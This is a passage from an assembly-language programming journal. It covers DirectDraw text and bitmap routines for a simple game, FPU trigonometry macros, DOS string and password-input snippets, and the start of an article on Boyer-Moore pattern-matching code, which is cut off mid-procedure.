        ; Write out the text at the desired location
        ;===========================================
        INVOKE TextOut, hDC, x, y, text, num_chars

        ;===========================================
        ; release the DC we obtained
        ;===========================================
        DDS4INVOKE ReleaseDC, surface, hDC

done:
        ;===================
        ; We completed
        ;===================
        return TRUE

DD_Draw_Text ENDP
;########################################################################
; END DD_Draw_Text
;########################################################################


Following this code is relatively simple. First, we get the Device Context for
our surface. In Windows, drawing is typically done through these DC's ( Device
Contexts ), thus ... if you want to use any GDI function in Direct Draw the
first thing you have to do is get the DC for your surface. Then, we set the
background mode and text color using basic Windows GDI calls. Now, we are ready
to draw our text ... again we just make a call to the Windows function
TextOut(). There are many others, this is just the one that I chose to use.
Finally, we release the DC for our surface.

The rest of the Direct Draw routines follow the same basic format and use the
same types of calls, so they shouldn't be too hard to figure out. The basic
idea behind all of the routines is the same: encapsulate the functionality we
need into some services that still allow us to be flexible. Now, we need to
write the code to handle our bitmaps that go into these surfaces.


Our Bitmap Library
------------------
We are now ready to write our bitmap library. We will start like the Direct
Draw library by determining what we need. As far as I can tell right now, we
should be good with two simple routines: a bitmap loader, and a draw routine.
Since we will be using surfaces, the draw routine should draw onto the passed
surface. Our loader will load our special file format which I will cover in a
moment. That should be it, there isn't that much that is needed for bitmaps
nowadays. DirectX is how most manipulation occurs, especially since many things
can be done in hardware. With that in mind we will cover our unique file
format.

Normally, creating your own file format is a headache and isn't worth the
trouble. However, in our case it greatly simplifies the code and I have
provided the conversion utility with the download package. This format is
probably one of the easiest you will ever encounter. It has five main parts:
Width, Height, BPP, Size of Buffer, and Buffer. The first three give
information on the image. I have our library setup for 16 bpp only but
implementing other bit depths would be fairly easy. The fourth section tells us
how large of a buffer we need for the image, and the fifth section is that
buffer. Having our own format not only makes the code we need to write a lot
easier, it also prevents other people from seeing our work before they were
meant to see it! Now, how do we load this bad boy?


;########################################################################
; Create_From_SFP Procedure
;########################################################################
Create_From_SFP PROC    ptr_BMP:DWORD, sfp_file:DWORD, desired_bpp:DWORD

        ;=========================================================
        ; This function will allocate our bitmap structure and
        ; will load the bitmap from an SFP file. Converting if 
        ; it is needed based on the passed value.
        ;=========================================================

        ;=================================
        ; Local Variables
        ;=================================
        LOCAL hFile     :DWORD
        LOCAL hSFP      :DWORD
        LOCAL Img_Left  :DWORD
        LOCAL Img_Alias :DWORD
        LOCAL red       :DWORD
        LOCAL green     :DWORD
        LOCAL blue      :DWORD
        LOCAL Dest_Alias :DWORD

        ;=================================
        ; Create the SFP file
        ;=================================
        INVOKE CreateFile, sfp_file, GENERIC_READ,FILE_SHARE_READ, \
                NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL
        MOV     hFile, EAX

        ;===============================
        ; Test for an error
        ;===============================
        .IF EAX == INVALID_HANDLE_VALUE
                JMP err
        .ENDIF

        ;===============================
        ; Get the file size
        ;===============================
        INVOKE GetFileSize, hFile, NULL
        PUSH    EAX

        ;================================
        ; test for an error
        ;================================
        .IF EAX == -1
                JMP err
        .ENDIF

        ;==============================================
        ; Allocate enough memeory to hold the file
        ;==============================================
        INVOKE GlobalAlloc, GMEM_FIXED, EAX
        MOV     hSFP, EAX

        ;===================================
        ; test for an error
        ;===================================
        .IF EAX == 0
                JMP err
        .ENDIF

        ;===================================
        ; Put the file into memory
        ;===================================
        POP     EAX
        INVOKE ReadFile, hFile, hSFP, EAX, OFFSET Amount_Read, NULL

        ;====================================
        ; Test for an error
        ;====================================
        .IF EAX == FALSE
                ;========================
                ; We failed so leave
                ;========================
                JMP err
 
        .ENDIF

        ;===================================
        ; Determine the size without the BPP
        ;===================================
        MOV     EBX, hSFP
        MOV     EAX, DWORD PTR [EBX]
        ADD     EBX, 4
        MOV     ECX, DWORD PTR [EBX]
        MUL     ECX
        PUSH    EAX
 
        ;======================================
        ; Do we allocate a 16 or 24 bit buffer
        ;======================================
        .IF desired_bpp == 16
                ;============================
                ; Just allocate a 16-bit
                ;============================
                POP     EAX
                SHL     EAX, 1
                INVOKE GlobalAlloc, GMEM_FIXED, EAX
                MOV     EBX, ptr_BMP
                MOV     DWORD PTR [EBX], EAX
                MOV     Dest_Alias, EAX

                ;====================================
                ; Test for an error
                ;====================================
                .IF EAX == FALSE
                        ;========================
                        ; We failed so leave
                        ;========================
                        JMP err
 
                .ENDIF

        .ELSE
                ;========================================
                ; This is where code for 24 bit would go
                ;========================================

                ;============================
                ; For now just return an err
                ;============================
                JMP err

        .ENDIF

        ;====================================
        ; Setup for reading in
        ;====================================
        MOV     EBX, hSFP
        ADD     EBX, 10
        MOV     EAX, DWORD PTR[EBX]
        MOV     Img_Left, EAX
        ADD     EBX, 4
        MOV     Img_Alias, EBX

        ;====================================
        ; Now lets start converting values
        ;====================================
        .WHILE Img_Left > 0
                ;==================================
                ; Build a color word based on 
                ; the desired BPP or transfer
                ;==================================
                .IF desired_bpp == 16
                        ;==========================================
                        ; Read in a byte for blue, green and red
                        ;==========================================
                        XOR     ECX, ECX
                        MOV     EBX, Img_Alias
                        MOV     CL, BYTE PTR [EBX]
                        MOV     blue, ECX
                        INC     EBX
                        MOV     CL, BYTE PTR [EBX]
                        MOV     green, ECX
                        INC     EBX
                        MOV     CL, BYTE PTR [EBX]
                        MOV     red, ECX
  
                        ;=======================
                        ; Adjust the Img_Alias
                        ;=======================
                        ADD     Img_Alias, 3

                        ;================================
                        ; Do we build a 555 or a 565 val
                        ;================================
                        .IF Is_555 == TRUE
                                ;============================
                                ; Build the 555 color word
                                ;============================
                                RGB16BIT_555 red, green, blue
                        .ELSE
                                ;============================
                                ; Build the 565 color word
                                ;============================
                                RGB16BIT_565 red, green, blue

                        .ENDIF

                        ;================================
                        ; Transer it to the final buffer
                        ;================================
                        MOV     EBX, Dest_Alias
                        MOV     WORD PTR [EBX], AX

                        ;============================
                        ; Adjust the dest by 2
                        ;============================
                        ADD     Dest_Alias, 2

                .ELSE
                        ;========================================
                        ; This is where code for 24 bit would go
                        ;========================================

                        ;============================
                        ; For now just return an err
                        ;============================
                        JMP err
  
                .ENDIF

                ;=====================
                ; Sub amount left by 3
                ;=====================
                SUB     Img_Left, 3

        .ENDW

        ;====================================
        ; Free the SFP Memory
        ;====================================
        INVOKE GlobalFree, hSFP

done:
        ;===================
        ; We completed
        ;===================
        return TRUE

err:
        ;====================================
        ; Free the SFP Memory
        ;====================================
        INVOKE GlobalFree, hSFP

        ;===================
        ; We didn't make it
        ;===================
        return FALSE

Create_From_SFP ENDP
;########################################################################
; END Create_From_SFP
;########################################################################


The code starts out by creating the file, which, in Windows, is how you open
it, and then retrieves the file size. This allows us to allocate enough memory
to load our entire file in. The process of reading in the file is fairly simple
we just make a call. As usual the most important parts are those that check for
errors.

Once the file is in memory we compute the size of the desired image based upon
the width and height in our header, and the "desired_bpp" level that was passed
in to the function. Then we allocate yet another buffer with the information we
calculated. This is the buffer that is kept in the end.

The next step is the heart of our load function. Here we read in 3 bytes, since
our pictures are stored as 24-bit images, and create the proper color value
( 5-6-5 or 5-5-5 ) for the buffer. We then store that value in the new buffer
that we just created. We loop through all pixels in our bitmap and convert each
to the desired format. The conversion is based on a pre-defined macro. You
could also implement the function by using the members we filled, when we
called the function to get the pixel format. This second way would allow you to
have a more abstract interface to the code ... but for our purposes it was
better to see what was really happening to the bits.

At the completion of our loop we free the main buffer and return the address of
the buffer with our converted pixel values. If an error occurs at any point, we
jump to our error code which frees the possible buffer we could have created.
This is to prevent memory leaks. And ... that is it for the load function.

Once the bitmap is loaded into memory we need to be able to draw it onto a
Direct Draw surface. Whether we are loading it in there permanently, or just
drawing a quick picture onto the back buffer should not matter. So, we will
look at a function that draws the passed bitmap onto our passed surface. Here
is the code:


;########################################################################
; Draw_Bitmap Procedure
;########################################################################
Draw_Bitmap PROC surface:DWORD, bmp_buffer:DWORD, lPitch:DWORD, bpp:DWORD

        ;=========================================================
        ; This function will draw the BMP on the surface. 
        ; the surface must be locked before the call.
        ;
        ; It uses the width and height of the screen to do so.
        ; I hardcoded this in just 'cause ... okay.
        ;
        ; This routine does not do transparency!
        ;=========================================================

        ;===========================
        ; Local Variables
        ;===========================
        LOCAL dest_addr :DWORD
        LOCAL source_addr :DWORD

        ;===========================
        ; Init the addresses
        ;===========================
        MOV     EAX, surface
        MOV     EBX, bmp_buffer
        MOV     dest_addr, EAX
        MOV     source_addr, EBX
 
        ;===========================
        ; Init counter with height
        ;
        ; Hard-coded in.
        ;===========================
        MOV     EDX, 480

        ;=================================
        ; We are in 16 bit mode
        ;=================================

 copy_loop1: 
        ;=============================
        ; Setup num of bytes in width
        ;
        ; Hard-coded also.
        ;
        ; 640*2/4 = 320.
        ;=============================
        MOV     ECX, 320

        ;=============================
        ; Set source and dest
        ;=============================
        MOV     EDI, dest_addr
        MOV     ESI, source_addr

        ;======================================
        ; Move by DWORDS
        ;======================================
        REP movsd
  
        ;==============================
        ; Adjust the variables
        ;==============================
        MOV     EAX, lPitch
        MOV     EBX, 1280
        ADD     dest_addr, EAX
        ADD     source_addr, EBX

        ;========================
        ; Dec the line counter
        ;========================
        DEC     EDX 

        ;========================
        ; Did we hit bottom?
        ;========================
        JNE copy_loop1


done:
        ;===================
        ; We completed
        ;===================
        return TRUE

err:
        ;===================
        ; We didn't make it
        ;===================
        return FALSE

Draw_Bitmap ENDP
;########################################################################
; END Draw_Bitmap
;########################################################################


This function is a little bit more advanced than some of the others we have
seen, so pay attention. We know, as assembly programmers, that if we can get
everything into a register things will be faster than if we had to access
memory. So, in that spirit, we place the starting source and destination
addresses into registers.

Then, we compute the number of WORDS in our line. We can then divide this
number by 2, so that we have the number of DWORDS in a line. I have hard-coded
this number in since we will always be in 640 x 480 x 16 for our game. Once we
have this number we place it in the register ECX. The reason for this is our
next instruction MOVSD can be combined with the REP label. This will move a
DWORD, decrement ECX by 1, compare ECX to ZERO if not equal then MOVE A DWORD,
etc. until ECX is equal to zero. In short it is like having a For loop with
the counter in ECX. As we have the code right now, it is moving a DWORD from
the source into the destination until we have exhausted the number of DWORDS in
our line. At which point it does this over again until we have reached the
number of lines in our height ( 480 in our case ).

Those are our only two functions in the bitmap module. They are short and
sweet. More importantly, now that we have our bitmap and Direct Draw routines
coded we can write the code to display our loading game screen!


A Game ... Well, Kinda'
-----------------------
The library routines are complete and we are now ready to plunge into our game
code. We will start out by looking at the game initialization function since it
is called first in our code.


;########################################################################
; Game_Init Procedure
;########################################################################
Game_Init PROC

        ;=========================================================
        ; This function will setup the game
        ;=========================================================
 
        ;============================================
        ; Initialize Direct Draw -- 640, 480, bpp
        ;============================================
        INVOKE DD_Init, 640, 480, screen_bpp

        ;====================================
        ; Test for an error
        ;====================================
        .IF EAX == FALSE
                ;========================
                ; We failed so leave
                ;========================
                JMP err
 
        .ENDIF

        ;======================================
        ; Read in the bitmap and create buffer
        ;======================================
        INVOKE Create_From_SFP, ADDR ptr_BMP_LOAD, ADDR szLoading, screen_bpp

        ;====================================
        ; Test for an error
        ;====================================
        .IF EAX == FALSE
                ;========================
                ; We failed so leave
                ;========================
                JMP err
 
        .ENDIF

        ;===================================
        ; Lock the DirectDraw back buffer
        ;===================================
        INVOKE DD_Lock_Surface, lpddsback, ADDR lPitch

        ;============================
        ; Check for an error
        ;============================
        .IF EAX == FALSE
                ;===================
                ; Jump to err
                ;===================
                JMP err

        .ENDIF

        ;===================================
        ; Draw the bitmap onto the surface
        ;===================================
        INVOKE Draw_Bitmap, EAX, ptr_BMP_LOAD, lPitch, screen_bpp

        ;===================================
        ; Unlock the back buffer
        ;===================================
        INVOKE DD_Unlock_Surface, lpddsback

        ;============================
        ; Check for an error
        ;============================
        .IF EAX == FALSE
                ;===================
                ; Jump to err
                ;===================
                JMP err

        .ENDIF

        ;=====================================
        ; Everything okay so flip displayed
        ; surfaces and make loading visible
        ;======================================
        INVOKE DD_Flip

        ;============================
        ; Check for an error
        ;============================
        .IF EAX == FALSE
                ;===================
                ; Jump to err
                ;===================
                JMP err

        .ENDIF

done:
        ;===================
        ; We completed
        ;===================
        return TRUE

err:
        ;===================
        ; We didn't make it
        ;===================
        return FALSE

Game_Init ENDP
;########################################################################
; END Game_Init
;########################################################################


This function plays the most important part in our game so far. In this routine
we make the call to initialize Direct Draw. If this succeeds we load in our
"Loading Game " bitmap file from disk. After that we lock the back buffer. This
is very important to do since we will be accessing the memory directly. After
it is locked we can draw our bitmap onto the surface and then unlock it. The
final call in our procedure is to flip the buffers. Since we have the bitmap on
the back buffer, we need it to be visible. Therefore, we exchange the buffers.
The front goes to the back and the back goes to the front. At the completion of
this call our bitmap is now visible on screen. One thing that may be confusing
here is why we didn't load the bitmap into a Direct Draw surface. The reason is
we will only be using it once so there was no need to waste a surface.

Next on our list of things to code is the Windows callback function itself.
This function is how we handle messages in Windows. Anytime we want to handle a
message the code will go in this function. Take a look at how we have it setup
currently.


;########################################################################
; Main Window Callback Procedure -- WndProc
;########################################################################
WndProc PROC hWin       :DWORD,
                uMsg    :DWORD,
                wParam  :DWORD,
                lParam  :DWORD

.IF uMsg == WM_COMMAND
        ;===========================
        ; We don't have a menu, but 
        ; if we did this is where it
        ; would go!
        ;===========================

.ELSEIF uMsg == WM_KEYDOWN
        ;=======================================
        ; Since we don't have a Direct input
        ; system coded yet we will just check 
        ; for escape to be pressed
        ;=======================================
        MOV     EAX, wParam
        .IF EAX == VK_ESCAPE
                ;===========================
                ; Kill the application
                ;===========================
                INVOKE PostQuitMessage,NULL

        .ENDIF
 
        ;==========================
        ; We processed it
        ;==========================
        return 0 

.ELSEIF uMsg == WM_DESTROY
        ;===========================
        ; Kill the application
        ;===========================
        INVOKE PostQuitMessage,NULL
         return 0 
 
.ENDIF

;=================================================
; Let the default procedure handle the message
;=================================================
INVOKE DefWindowProc,hWin,uMsg,wParam,lParam

RET

WndProc endp
;########################################################################
; End of Main Windows Callback Procedure
;########################################################################


The code is fairly self-explanatory. So far we only deal with 2 messages the
WM_KEYDOWN message and the WM_DESTROY message. We process the WM_KEYDOWN
message so that the user can hit escape and exit our game. We will be coding a
Direct Input system, but until then we needed a way to quit the game! The one
thing you should notice is that any messages we do not deal with are handled by
the "default" processing function -- DefWindowProc(). This function is defined
by Windows already. You just need to call it whenever you do not handle a
message.

The game main function we aren't going to look at, simply because it is empty.
We haven't added any solid code to our game loop yet. But, everything is
prepared so that next time we can get to it. That then leaves us with the
shutdown code.


;########################################################################
; Game_Shutdown Procedure
;########################################################################
Game_Shutdown PROC

        ;============================================================
        ; This shuts our game down and frees memory we allocated
        ;============================================================

        ;===========================
        ; Shutdown DirectDraw
        ;===========================
        INVOKE DD_ShutDown

        ;==========================
        ; Free the bitmap memory
        ;==========================
        INVOKE GlobalFree, ptr_BMP_LOAD

done:
        ;===================
        ; We completed
        ;===================
        return TRUE

err:
        ;===================
        ; We didn't make it
        ;===================
        return FALSE

Game_Shutdown ENDP
;########################################################################
; END Game_Shutdown
;########################################################################


Here we make the call to shutdown our Direct Draw library, and we also free the
memory we allocated earlier for the bitmap. We could have freed the memory
elsewhere and maybe next issue we will. But, things are a bit easier to
understand when all of your initialization and cleanup code is in one place.

As you can see there isn't that much code in our game specific stuff. The
majority resides in our modules, such as Direct Draw. This allows us to keep
our code clean and any changes we may need to make later on a much easier since
things aren't hard-coded inline. Anyway, the end result of what you have just
seen is a Loading screen that is displayed until the user hits the escape key.
And that ... primitive though it may be ... is our game thus far.


Until Next Time ...
-------------------
We covered a lot of material in this article. We now have a bitmap library, and
a Direct Draw library for our game. These are core modules that you should be
able to use in any game. By breaking up the code like this we are able to keep
our game code separate from the library code. You do not want any module to be
dependent on another module.

In the next article we will be continuing our module development with Direct
Input. We will also be creating our menu system next time. These two things
should keep us busy. So, that is what you have to look forward to in the next
installment.

Once again young grasshoppers, until next time ... happy coding.

Get the complete source for the game here:

   http://asmjournal.freeservers.com/files/game2.zip


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                   Basic trigonometry functions
                                                   by Eoin O'Callaghan

;Summary:       Basic trigonometry functions not directly supported on the FPU
;               (ArcCos, ArcSin, HSin, HCos and HTan).
;Compatibility: Floating-Point Unit.
;Notes:         None.

.data 
        hPi dt 3FFFC90FDAA22168C235h ; tbyte
        iL2e dt 3FFEB17217F7D1CF79ACh ; tbyte
        half dd 0.5

ArcCos MACRO ;Inverse Cosine, st(0) = arccos(st(0))
        fld1
        fld st(1)
        fmul st,st
        fsub
        fsqrt
        fpatan
        fchs
        fld hPi
        fadd
EndM

ArcSin Macro ;Inverse Sine, st(0) = arcsin(st(0))
        fld1
        fld st(1)
        fmul st,st
        fsub
        fsqrt
        fpatan
EndM

HSin Macro ;Hyperbolic Sin, st(0) = hsin(st(0)
        fldl2e
        fmul
        fld st
        frndint
        fsub st(1),st                
        fld1
        fscale                        
        fxch
        fstp st
        fxch            
        f2xm1
        fld1
        fadd    
        fmul

        fld st
        fld1
        fdivr
        fsub
        fmul half
EndM

HCos Macro ;Hyperbolic Cos, st(0) = hcos(st(0)
        fldl2e
        fmul
        fld st
        frndint
        fsub st(1),st
        fld1
        fscale
        fxch
        fstp st
        fxch
        f2xm1
        fld1
        fadd    
        fmul

        fld st
        fld1
        fdivr
        fadd
        fmul half
EndM

HTan Macro ;Hyperbolic Tan, st(0) = htan(st(0)
        fldl2e
        fmul
        fld st
        frndint
        fsub st(1),st
        fld1
        fscale
        fxch
        fstp st
        fxch
        f2xm1
        fld1
        fadd    
        fmul

        fmul st,st
        fld st
        fld1
        fadd
        fxch
        fld1
        fsub
        fdivr
EndM


                                                                   getpass
                                                                   by Jake Bush

;Summary:       Get a password type input.
;Compatibility: x86
;Notes:         input:
;                  BX    = Max length to save.
;                  ES:DI = Location to save the input. (Size must be at least
;                          BX + 1).
;               output:
;                  none.

getpass:
        pusha
        xor    cx, cx
.1:     xor    ah, ah
        int    16h
        cmp    al, 0dh
        je    .4
        cmp    cx, 0h
        je    .2
        cmp    al, 8h
        je    .3
.2:     cmp    cx, bx
        je    .1
        cmp    al, 20h
        jb    .1
        stosb
        pusha
        mov    al, '*'
        mov    ah, 0eh
        xor    bh, bh
        mov    cx, 1h
        int    10h
        popa
        inc    cx
        jmp    .1
.3:     dec    di
        dec    cx
        pusha
        mov    al, 8h
        mov    ah, 0eh
        xor    bh, bh
        mov    cx, 1h
        int    10h
        mov    al, ' '
        int    10h
        mov    al, 8h
        int    10h
        popa
        jmp    .1
.4:     mov    al, 0h
        stosb
        popa
        ret


                                                                   strcmp
                                                                   by Jake Bush

;Summary:       Compares two strings.
;Compatibility: x86
;Notes:         input:
;                  DS:SI = String 1.
;                  ES:DI = String 2.
;               output:
;                  CF    = 0 = Equal
;                          1 = Unequal

strcmp:
        pusha
.1:     mov    al, [ds:si]
        mov    ah, [es:di]
        cmp    ah, al
        jne    .2
        cmp    ax, 0h
        je    .3
        inc    si
        inc    di
        jmp    .1
.2:     stc
        jmp    .4
.3:     clc
.4:     popa
        ret


                                                                   strlwr
                                                                   by Jake Bush

;Summary:       Converts all the characters in a ASCIIz string to lower-case.
;Compatibility: x86
;Notes:         input:
;                  DS:SI = Location of an string to convert.
;                  ES:DI = Location to save the converted string.
;               output:
;                  none.

strlwr:
        pusha
.1:     lodsb
        cmp    al, 0h
        je    .3
        cmp    al, 41h
        jb    .2
        cmp    al, 90h
        ja    .2
        or    al, 00100000b
.2:     stosb
        jmp    .1
.3:     popa
        ret


                                                                   strupr
                                                                   by Jake Bush

;Summary:       Converts all the characters in a ASCIIz string to upper-case.
;Compatibility: x86
;Notes:         input:
;                  DS:SI = Location of an string to convert.
;                  ES:DI = Location to save the converted string.
;               output:
;                  none.

strupr:
        pusha
.1:     lodsb
        cmp    al, 0h
        je    .3
        cmp    al, 61h
        jb    .2
        cmp    al, 7ah
        ja    .2
        xor    al, 00100000b
.2:     stosb
        jmp    .1
.3:     popa
        ret


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE


Challenge
---------
Code a fast pattern matching algorithm.


Solution
--------
Four approaches are presented here, three by Steve Hutchesson, who also wrote a
very good introductory text explaining the foundation of the Boyer Moore search
algorithm and its variations, and one by buliaNaza who aims at writing the
fastest binary string search algorithm for PPlain and PMMX processors.


                            Three Boyer Moore Exact Pattern Matching Algorithms
                            by Steve Hutchesson


Three Boyer Moore Exact Pattern Matching Algorithms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Steve Hutchesson
Sydney
Australia
August 2001
hutch@pbq.com.au

In 1977 Robert Boyer and L. Moore designed an exact pattern matching
algorithm that was different from any of the contemporary designs of the
time. It had a fundamentally different logic that compared the pattern
being searched for to the current location in the source in reverse order.

The logic was based on obtaining more information from performing the
comparison in reverse than the standard methods of forward comparison. If a
character that caused the mismatch was not among the characters that were
in the pattern being matched, there was no point in matching any further
characters so the pattern could be shifted right by the number of
characters needed to go past it.

This shift has usually been called the BAD CHARACTER shift.

              |
source  : bad character shift
pattern : shift
              |

Character "t" mismatches with character "c" in the source. "c" is not in
the pattern being searched for and there is no point in searching further
back as no match is possible at the current location so the pattern is
shifted the number of places right so that the pattern is completely past
the mismatching character.

                   |
source  : bad character shift
pattern :      shift
                   |

Character "t" again mismatches with character "c" in the source so the
pattern is again shifted completely past the mismatching character.

                        |
source  : bad character shift
pattern :           shift
                        |

The next mismatch is different to the previous ones, it is with a character
that is within the pattern being searched for and this requires a different
type of shift. When a character is within the pattern, it allows the
capacity to start matching the pattern to the source. This shift is usually
called the GOOD SUFFIX shift but it is sometimes called the MATCHING SHIFT.

The fundamental Boyer Moore design uses a clever method of determining if
the character being compared is within the pattern being searched for or
not. It constructs a table of 256 members which is initially filled with
the length of the pattern being searched for in the source. It then
overwrites the position of each character in the pattern into the table at
the correct position for the character's ascii value.

This means that a character being compared can be tested in one memory read
to determine if it is within the pattern or not, if the shift in the table
is the same length as the pattern, the character is not in the pattern, if
it is less, it is a character that is in the pattern.

This will produce a set of shifts for the character in the pattern that
descend in their value.

pattern : shift
          4321      <- GOOD SUFFIX shift
          12345     <- BAD CHARACTER shift

The method of calculating the BAD CHARACTER shift is based on the ascending
count from the beginning of the pattern. If it is the first character being
compared, the shift is the length of the pattern, for each comparison made,
the shift decrements by one.

Apply the GOOD SUFFIX shift from the table and the pattern is shifted
across so that the character "s" lines up with the "s" in the source and
the pattern has been matched.

                            *
source  : bad character shift
pattern :               shift
                            *

This example works OK because the mismatch occurs on the first comparison
but in patterns that have repeat sequences of characters, this matching by
itself will often fail to produce a match.

pattern : foooooo
          711111    <- GOOD SUFFIX shift
          1234567   <- BAD CHARACTER shift

The sequence of "1" in the GOOD SUFFIX shift is caused by the overwriting
of the location for the character "o" in the table for each of its
occurrences. The normal method is to subtract the BAD CHARACTER shift from
the GOOD SUFFIX shift if the mismatch is not the first at the current
location in the source. This can produce a value less than 1 so a minimum
shift of 1 is applied if this happens.

Coding Considerations
~~~~~~~~~~~~~~~~~~~~~
Much of the available technical data on exact pattern matching is written
in ANSI C and it tends to carry the set of assumptions related to the
capacity of that language. The "holy grail" of exact pattern matching is to
perform as few comparisons as necessary to obtain the match if it exists.
This is usually called "sublinearity" and it means comparing less
characters that a traditional forward BYTE scanner.

The problem with this approach is that if the overhead to produce the
"sublinearity" is too large, the algorithm is slower than a BYTE scanner so
considerations of theoretical design must be tempered with what is possible
with good coding practice to deliver the desired speed.

The BAD CHARACTER shift has often been coded in high level languages as
another table but it is a very inefficient way to code the shift as the
loop counter in the main comparison loop holds the same value and it can be
accessed a lot faster than a member of a table in memory.

The three version presented below use an Intel specific optimisation
related to preventing a register stall by reading and comparing a byte in
AL and subsequently using the EAX register in the table location
calculation. XOR EAX, EAX or SUB EAX, EAX both zero the register and the
stall does not occur. This makes the code slightly slower on AMD hardware
but not by very much.

There is an additional heuristic in the original Boyer Moore algorithm that
has not been implemented, when a BAD CHARACTER shift has been determined,
the heuristic requires that the larger of the two shifts should be applied.
In practice the two extra instructions to perform this comparison reduce
the speed of the algorithm by about 5%.

Where a GOOD SUFFIX shift is required that is the first mismatch at the
current location, the calculation that subtracts the BAD CHARACTER shift is
not required so a seperate loop has been included to save this extra two
instructions. The speed increase is about 5% for doing so.

Processor Variation
~~~~~~~~~~~~~~~~~~~
Testing shows that there is measurable differences between later Intel
processors and later AMD processors. The AMD has a shorter pipeline and a
lower penalty for register stalls where the Intel processors have better
branch prediction and a lower penalty for mispredicted jumps. The GOOD
SUFFIX shift favours the AMD processors where the BAD CHARACTER shift works
better on the Intel processors.

Three variations are implemented that utilise the different shifts, the
original BM algorithm uses both shifts, a variation that is similar to a
Horspool variation uses only the BAD CHARACTER shift and another variation
only uses the GOOD SUFFIX shift.

Algorithm Variations
~~~~~~~~~~~~~~~~~~~~
The original BM algorithm has a slightly higher overhead than the two
variations but it generally produces a larger shift and this has the effect
that it is more consistent across both processor types with different
patterns and different pattern lengths. This is because it it more
dependent on logic that fast loop code.

The Horspool variation perfoms well on Intel hardware and is well suited for
plain text search in things like text editors and word processors but it is
sensitive to patterns that have a high frequency of characters in the source
being searched. Its advantage is small loop code in the searching phase. In
this implementation, it does the comparison in reverse order as this method
produces the BAD CHARACTER shift in the most efficient manner.

The second variation uses only the GOOD SUFFIX shift and generally performs
well on older Intel hardware and later AMD machines. It has the advantage of
fast loop code but by only using one of the available shifts, its average shift
length is shorter than the original algorithm. It uses the same bypass for the
first mismatch that the original BM algo has.

Limitations
~~~~~~~~~~~
The pattern length threshold for improving on a forward byte scanner appears to
be about 6 characters. Below this a BYTE scanner is faster. A BM type algorithm
has about a 300 character penalty in the time it takes to construct the table
and this must be kept in mind if the task requires recursively searching short
sources for short patterns.

A slightly more subtle consideration is what is called "mismatch recovery".
Boyer Moore algorithms have normally been sensitive to the frequency of end
characters in the pattern and this is easy to demonstrate when searching plain
text when the pattern has a trailing blank space in it. EXAMPLE : "pattern "

The solution is to code the comparison loop with a very short instruction path
and while this does not particularly increase the absolute forward scanning
speed of the algorithm type, it does improve its recovery from repeated
mismatches.

The three algorithms presented below have very good mismatch recovery which is
related to their very short comparison loops instruction paths.

The three algorithms have been tested on Intel Celeron, PII and PIII machines
and AMD K6-2, Duron and Athlon machines. They have been optimised to run on
both types without specifically targetting one particular model. Slight speed
increases can be obtained by coding specifically for one particular model
but usually at the expense of most other processors.

The parameters for the 3 procedures.

startpos    zero based offset to start searching in the source
lpSource    the address of the source to search
srcLngth    the length of the source
lpSubStr    the address of the pattern to search for
subLngth    the length of the pattern

                @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                @                                     @
                @   The basic Boyer Moore algorithm   @
                @                                     @
                @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

; #########################################################################

    .486
    .model flat, stdcall  ; 32 bit memory model
    option casemap :none  ; case sensitive

    .code

; #########################################################################

BMBinSearch proc startpos:DWORD,
                 lpSource:DWORD,srcLngth:DWORD,
                 lpSubStr:DWORD,subLngth:DWORD

    LOCAL cval   :DWORD
    LOCAL shift_table[256]:DWORD

    push ebx
    push esi
    push edi

    mov ebx, subLngth

    cmp ebx, 1
    jg @F
    mov eax, -2                 ; string too short, must be > 1
    jmp Cleanup
  @@:

    mov esi, lpSource
    add esi, srcLngth
    sub esi, ebx
    mov edx, esi            ; set Exit Length

  ; ----------------------------------------
  ; load shift table with value in subLngth
  ; ----------------------------------------
    mov ecx, 256
    mov eax, ebx
    lea edi, shift_table
    rep stosd

  ; ----------------------------------------------
  ; load decending count values into shift table
  ; ----------------------------------------------
    mov ecx, ebx                ; SubString length in ECX
    dec ecx                     ; correct for zero based index
    mov esi, lpSubStr           ; address of SubString in ESI
    lea edi, shift_table

    xor eax, eax

  Write_Shift_Chars:
    mov al, [esi]               ; get the character
    inc esi
    mov [edi+eax*4], ecx        ; write shift for each character
    dec ecx                     ; to ascii location in table
    jnz Write_Shift_Chars

  ; -----------------------------
  ; set up for main compare loop
  ; -----------------------------
    mov ecx, ebx
    dec ecx
    mov cval, ecx

    mov esi, lpSource
    mov edi, lpSubStr
    add esi, startpos           ; add starting position

    jmp Pre_Loop

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

  Calc_Suffix_Shift:
    add eax, ecx
    sub eax, cval               ; sub loop count
    jns Add_Suffix_Shift
    mov eax, 1                  ; minimum shift is 1

  Add_Suffix_Shift:
    add esi, eax                ; add SUFFIX shift
    mov ecx, cval               ; reset counter in compare loop

  Test_Length:
    cmp edx, esi                ; test exit condition
    jl No_Match

  Pre_Loop:
    xor eax, eax                ; zero EAX for following partial writes
    mov al, [esi+ecx]
    cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
    je @F
    mov eax, shift_table[eax*4]
    cmp ebx, eax
    jne Add_Suffix_Shift        ; bypass SUFFIX calculations
    lea esi, [esi+ecx+1]        ; add BAD CHAR shift
    jmp Test_Length
  @@:
    dec ecx
    xor eax, eax                ; zero EAX for following partial writes

  Cmp_Loop:
    mov al, [esi+ecx]
    cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
    jne Set_Shift               ; if not equal, get next shift
    dec ecx
    jns Cmp_Loop
    jmp Match                   ; fall through on match

  Set_Shift:
    mov eax, shift_table[eax*4]
    cmp ebx, eax
    jne Calc_Suffix_Shift       ; run SUFFIX calculations
    lea esi, [esi+ecx+1]        ; add BAD CHAR shift
    jmp Test_Length

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

  Match:
